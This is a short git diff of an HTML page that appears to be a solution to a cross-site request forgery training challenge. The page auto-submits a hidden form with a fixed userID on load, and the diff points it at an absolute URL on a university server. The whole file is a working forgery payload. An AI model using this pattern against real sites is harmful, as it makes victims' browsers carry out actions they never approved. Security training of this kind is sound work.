--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
 </head>
 <body onload="formy()">
   <img src="http://klockren.se/klockren.png" style="width: 500px;" />
-  <form name="hackerForm" action="/user/csrfchallengeone/plusplus" method="POST">
+  <form name="hackerForm" action="https://snickerboa.it.liu.se/user/csrfchallengeone/plusplus" method="POST">
     <input type="hidden" name="userID" value="87d0d107b1521d76bb260cc345c13bf90f6f4cd6" />
     <input type="submit"/>
   </form>
